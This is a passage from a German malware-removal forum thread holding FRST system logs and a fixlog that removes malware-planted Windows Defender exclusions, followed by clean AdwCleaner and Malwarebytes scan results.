Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
TeamSpeak 3 Client (HKLM\...\TeamSpeak 3 Client) (Version: 3.1.7 - TeamSpeak Systems GmbH)
Vulkan Run Time Libraries 1.0.65.0 (HKLM\...\VulkanRT1.0.65.0) (Version: 1.0.65.0 - LunarG, Inc.) Hidden
WinRAR 5.50 (64-Bit) (HKLM\...\WinRAR archiver) (Version: 5.50.0 - win.rar GmbH)
==================== Benutzerdefinierte CLSID (Nicht auf der Ausnahmeliste): ==========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
ContextMenuHandlers1: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers1-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers3: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers5: [ACE] -> {5E2121EE-0300-11D4-8D3B-444553540000} => C:\Program Files\AMD\CNext\CNext\atiacm64.dll [2017-12-17] (Advanced Micro Devices, Inc.)
ContextMenuHandlers6: [MBAMShlExt] -> {57CE581A-0CB6-4266-9CA0-19364C90A0B3} => C:\Program Files\Malwarebytes\Anti-Malware\mbshlext.dll [2018-05-09] (Malwarebytes)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext.dll [2017-08-11] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program Files\WinRAR\rarext32.dll [2017-08-11] (Alexander Roshal)
==================== Geplante Aufgaben (Nicht auf der Ausnahmeliste) =============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
Task: {48AFC486-010B-4B4D-87F2-9F7C7EDA12AF} - System32\Tasks\Adobe Acrobat Update Task => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [2018-02-09] (Adobe Systems Incorporated)
Task: {57F4CA92-38A7-4B47-8B28-13BE860412BD} - System32\Tasks\Adobe Flash Player Updater => C:\Windows\SysWOW64\Macromed\Flash\FlashPlayerUpdateService.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {657B38A1-8903-4F90-8E4D-E9C7AEFDC6FC} - System32\Tasks\StartDVR => C:\Program Files\AMD\CNext\CNext\dvrcmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {B51F287F-670C-42C3-A480-43546148601C} - System32\Tasks\StartCN => C:\Program Files\AMD\CNext\CNext\cncmd.exe [2017-12-17] (Advanced Micro Devices, Inc.)
Task: {CBF07082-94D0-43DD-961D-5221CC36D495} - System32\Tasks\Microsoft\Windows\Windows Activation Technologies\ValidationTask => C:\Windows\system32\Wat\WatAdminSvc.exe [2018-02-01] ()
Task: {D74FFB45-80D0-40D0-B76B-3411A9AA73A2} - System32\Tasks\Adobe Flash Player NPAPI Notifier => C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_29_0_0_171_Plugin.exe [2018-05-09] (Adobe Systems Incorporated)
Task: {E3E11419-953A-4F4A-89E6-E6FE35B1A897} - System32\Tasks\ASUS\i-Setup161131 => C:\Windows\MEI\AsusSetup.exe [2013-08-22] (ASUSTeK Computer Inc.)
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Aufgabe verschoben. Die Datei, die durch die Aufgabe gestartet wird, wird nicht verschoben.)
==================== Verknüpfungen & WMI ========================
(Die Einträge können gelistet werden, um sie zurückzusetzen oder zu entfernen.)
==================== Geladene Module (Nicht auf der Ausnahmeliste) ==============
2018-01-02 17:05 - 2014-01-28 05:16 - 000936728 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\atkexComSvc.exe
2018-05-31 16:22 - 2018-04-30 12:54 - 002493648 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\MwacLib.dll
2018-05-31 16:22 - 2018-04-25 13:16 - 002297040 _____ () C:\PROGRAM FILES\MALWAREBYTES\ANTI-MALWARE\SelfProtectionSdk.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000908568 _____ () C:\Program Files\Logitech Gaming Software\libGLESv2.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 001096824 _____ () C:\Program Files\Logitech Gaming Software\platforms\qwindows.dll
2015-03-07 02:07 - 2015-03-07 02:07 - 000060184 _____ () C:\Program Files\Logitech Gaming Software\libEGL.dll
2017-10-20 05:29 - 2017-10-20 05:29 - 000241784 _____ () C:\Program Files\Logitech Gaming Software\imageformats\qjpeg.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000077824 _____ () C:\Program Files\Logitech Gaming Software\LAClient\zlib.dll
2017-10-20 05:02 - 2017-10-20 05:02 - 000144896 _____ () C:\Program Files\Logitech Gaming Software\LAClient\libssh2.dll
2018-01-02 17:05 - 2018-06-01 10:37 - 000033280 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\PEbiosinterface32.dll
2018-01-02 17:05 - 2014-01-28 05:16 - 000104448 _____ () C:\Program Files (x86)\ASUS\AXSP\1.02.00\ATKEX.dll
2017-12-17 22:06 - 2017-12-17 22:06 - 000357256 _____ () C:\Windows\SysWOW64\GameManager32.dll
2018-01-02 19:30 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 004969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 002632480 _____ () C:\Program Files (x86)\Steam\video.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 005137696 _____ () C:\Program Files (x86)\Steam\libavcodec-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000847136 _____ () C:\Program Files (x86)\Steam\libavutil-55.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000695584 _____ () C:\Program Files (x86)\Steam\libavformat-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000351520 _____ () C:\Program Files (x86)\Steam\libavresample-3.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000783648 _____ () C:\Program Files (x86)\Steam\libswscale-4.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 000979232 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2018-01-02 19:30 - 2016-07-05 00:17 - 000266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2018-01-02 19:31 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 083524384 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2018-01-02 19:30 - 2015-09-25 01:52 - 000119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 002253600 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libglesv2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 000109856 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libegl.dll
==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)
==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"
==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)
==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)
==================== Hosts Inhalt: ===============================
(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)
2009-07-14 04:34 - 2018-06-01 10:33 - 000000035 _____ C:\Windows\system32\Drivers\etc\hosts
==================== Andere Bereiche ============================
(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)
HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.
==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==
==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)
FirewallRules: [TCP Query User{3BA89802-EE14-46F8-A794-2A739BF5F99A}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
FirewallRules: [UDP Query User{C1155520-3B6F-4E4A-AC89-91381F99D08A}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
FirewallRules: [{40E49BB6-ABF0-47CB-B218-019E701E0804}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{AF5FA658-5740-4813-9449-2D931B2F3309}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{AFEE751F-FF72-402F-8133-F76B7A82208B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{24513EE5-D297-4D68-85F5-1CCB96F8D2E9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{D46D3F74-B919-457B-8B8B-3F642FECFF77}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{8A83AE2D-91DB-427A-B27C-8C00514F265B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{C08C2554-A723-4AE2-A5FF-7AF5B5B63745}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{94F28652-E20A-47DC-B119-43217FB92837}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe
==================== Wiederherstellungspunkte =========================
01-06-2018 00:17:39 Geplanter Prüfpunkt
==================== Fehlerhafte Geräte im Gerätemanager =============
==================== Fehlereinträge in der Ereignisanzeige: =========================
Applikationsfehler:
==================
Error: (06/01/2018 10:37:17 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 09:30:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: AsusSetup.exe, Version: 2.0.20.2, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0x00000000
Fehleroffset: 0x00000000
ID des fehlerhaften Prozesses: 0x7b0
Startzeit der fehlerhaften Anwendung: 0x01d3f915e0c98213
Pfad der fehlerhaften Anwendung: C:\Windows\MEI\AsusSetup.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 20bf9f77-6509-11e8-bc5e-10c37b6f5940
Error: (05/31/2018 09:30:48 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 04:28:49 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 04:18:19 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 04:06:36 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Error: (05/31/2018 02:19:46 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm NOTEPAD.EXE, Version 6.1.7601.18917 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.
Prozess-ID: ca4
Startzeit: 01d3f8d9a23650b5
Endzeit: 497
Anwendungspfad: C:\Windows\system32\NOTEPAD.EXE
Berichts-ID: e4a6dc91-64cc-11e8-9a9a-10c37b6f5940
Error: (05/31/2018 02:04:05 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.
Systemfehler:
=============
Error: (06/01/2018 10:39:21 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Intel(R) Management and Security Application Local Management Service" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.
Error: (06/01/2018 09:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 08:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 07:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 06:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 05:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 04:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
Error: (06/01/2018 03:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert
CodeIntegrity:
===================================
Date: 2018-06-01 10:37:35.824
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-06-01 09:52:51.030
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-31 21:31:05.188
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-31 16:47:31.273
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-28 16:16:44.753
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-28 15:33:27.596
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-27 11:36:38.184
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
Date: 2018-05-27 10:18:50.505
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.
==================== Speicherinformationen ===========================
Prozessor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Prozentuale Nutzung des RAM: 31%
Installierter physikalischer RAM: 8132.21 MB
Verfügbarer physikalischer RAM: 5555.02 MB
Summe virtueller Speicher: 16262.6 MB
Verfügbarer virtueller Speicher: 12726.03 MB
==================== Laufwerke ================================
Drive c: () (Fixed) (Total:931.41 GB) (Free:779.37 GB) NTFS
\\?\Volume{c6be1ac3-efc6-11e7-8a05-806e6f6e6963}\ (System-reserviert) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS
==================== MBR & Partitionstabelle ==================
========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: E8A87806)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)
==================== Ende von Addition.txt ============================
|
|
01.06.2018, 09:57
| #19 |
| | trojaner?/virus? Ich habe 2 mal schon geantwortet aber ich kann es hier nicht sehen, ist das normal? |
|
01.06.2018, 10:51
| #20 |
| /// TB-Ausbilder   | trojaner?/virus? Servus, ja, das mit dem 2x Posten ist ein Bug im Forum. Ist nicht schlimm.  Dein Rechner sollte jetzt schon besser laufen... Wir entfernen jetzt noch kleine Reste mit FRST und führen nochmal Kontrollen mit AdwCleaner und MBAM durch. Danach sehen wir weiter.  Schritt 1
Schritt 2
Schritt 3
Schritt 4
Bitte poste mit deiner nächsten Antwort
Geändert von M-K-D-B (01.06.2018 um 10:58 Uhr) |
|
01.06.2018, 13:10
| #21 |
| | trojaner?/virus? Fixlog Code:
ATTFilter Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 13:32:41) Run:3
Gestartet von C:\Users\Nico\Desktop
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================
fixlist Inhalt:
*****************
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows\rss
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Local\Temp\csrss
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Roaming\PatientSunset
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows\windefender.exe
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Local\Temp\wup
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows\System32\drivers
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|csrss.exe
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|cloudnet.exe
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|windefender.exe
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Reboot:
*****************
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Windows" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Windows\rss" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\Nico\AppData\Local\Temp\csrss" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\Nico\AppData\Roaming\PatientSunset" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Windows\windefender.exe" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\Nico\AppData\Local\Temp\wup" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Windows\System32\drivers" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\\csrss.exe" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\\cloudnet.exe" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\\windefender.exe" => erfolgreich entfernt
================== ExportKey: ===================
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]
=== Ende von ExportKey ===
Das System musste neu gestartet werden.
==== Ende von Fixlog 13:32:41 ====
Code:
ATTFilter # -------------------------------
# Malwarebytes AdwCleaner 7.1.1.0
# -------------------------------
# Build: 04-27-2018
# Database: 2018-06-01.1
# Support: https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start: 06-01-2018
# Duration: 00:00:01
# OS: Windows 7 Ultimate
# Cleaned: 0
# Failed: 0
***** [ Services ] *****
No malicious services cleaned.
***** [ Folders ] *****
No malicious folders cleaned.
***** [ Files ] *****
No malicious files cleaned.
***** [ DLL ] *****
No malicious DLLs cleaned.
***** [ WMI ] *****
No malicious WMI cleaned.
***** [ Shortcuts ] *****
No malicious shortcuts cleaned.
***** [ Tasks ] *****
No malicious tasks cleaned.
***** [ Registry ] *****
No malicious registry entries cleaned.
***** [ Chromium (and derivatives) ] *****
No malicious Chromium entries cleaned.
***** [ Chromium URLs ] *****
No malicious Chromium URLs cleaned.
***** [ Firefox (and derivatives) ] *****
No malicious Firefox entries cleaned.
***** [ Firefox URLs ] *****
No malicious Firefox URLs cleaned.
*************************
[+] Delete IFEO
[+] Delete Prefetch
[+] Delete Tracing Keys
[+] Reset BITS
[+] Reset Windows Firewall
[+] Reset Chromium Policies
[+] Reset IE Policies
[+] Reset Proxy Settings
[+] Reset Winsock
*************************
########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########
Code:
ATTFilter Malwarebytes
www.malwarebytes.com
-Protokolldetails-
Scan-Datum: 01.06.18
Scan-Zeit: 14:00
Protokolldatei: 6ad9a7f4-6593-11e8-9ce0-10c37b6f5940.json
Administrator: Ja
-Softwaredaten-
Version: 3.5.1.2522
Komponentenversion: 1.0.365
Version des Aktualisierungspakets: 1.0.5330
Lizenz: Testversion
-Systemdaten-
Betriebssystem: Windows 7 Service Pack 1
CPU: x64
Dateisystem: NTFS
Benutzer: Nico-PC\Nico
-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 235071
Erkannte Bedrohungen: 0
(keine bösartigen Elemente erkannt)
In die Quarantäne verschobene Bedrohungen: 0
(keine bösartigen Elemente erkannt)
Abgelaufene Zeit: 0 Min., 39 Sek.
-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung
-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)
Modul: 0
(keine bösartigen Elemente erkannt)
Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)
Registrierungswert: 0
(keine bösartigen Elemente erkannt)
Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)
Daten-Stream: 0
(keine bösartigen Elemente erkannt)
Ordner: 0
(keine bösartigen Elemente erkannt)
Datei: 0
(keine bösartigen Elemente erkannt)
Physischer Sektor: 0
(keine bösartigen Elemente erkannt)
WMI: 0
(keine bösartigen Elemente erkannt)
(end)
Code:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 14:06:57)
Gestartet von C:\Users\Nico\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2018-01-02 14:16:48)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-1284053026-2775073283-1402561352-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1284053026-2775073283-1402561352-1002 - Limited - Enabled)
Gast (S-1-5-21-1284053026-2775073283-1402561352-501 - Limited - Disabled)
Nico (S-1-5-21-1284053026-2775073283-1402561352-1000 - Administrator - Enabled) => C:\Users\Nico
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 18.011.20040 - Adobe Systems Incorporated)
Adobe Flash Player 29 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 29.0.0.171 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 17.12.2 - Advanced Micro Devices, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Drakensang Online (HKLM-x32\...\Drakensang Online) (Version: - )
Epic Games Launcher (HKLM-x32\...\{70843FAC-DA36-49CD-A9A1-6CB1665C9346}) (Version: 1.1.143.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1204 - Intel Corporation)
Intel(R) Network Connections 19.1.51.0 (HKLM\...\PROSetDX) (Version: 19.1.51.0 - Intel)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.0.16 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{60c073df-e736-4210-9c3a-5fc2b651cef3}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden
KeePass Password Safe 2.38 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.38 - Dominik Reichl)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
Logitech Gaming Software 8.96 (HKLM\...\Logitech Gaming Software) (Version: 8.96.88 - Logitech Inc.)
Malwarebytes Version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.7.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.7.02558 - Microsoft Corporation)
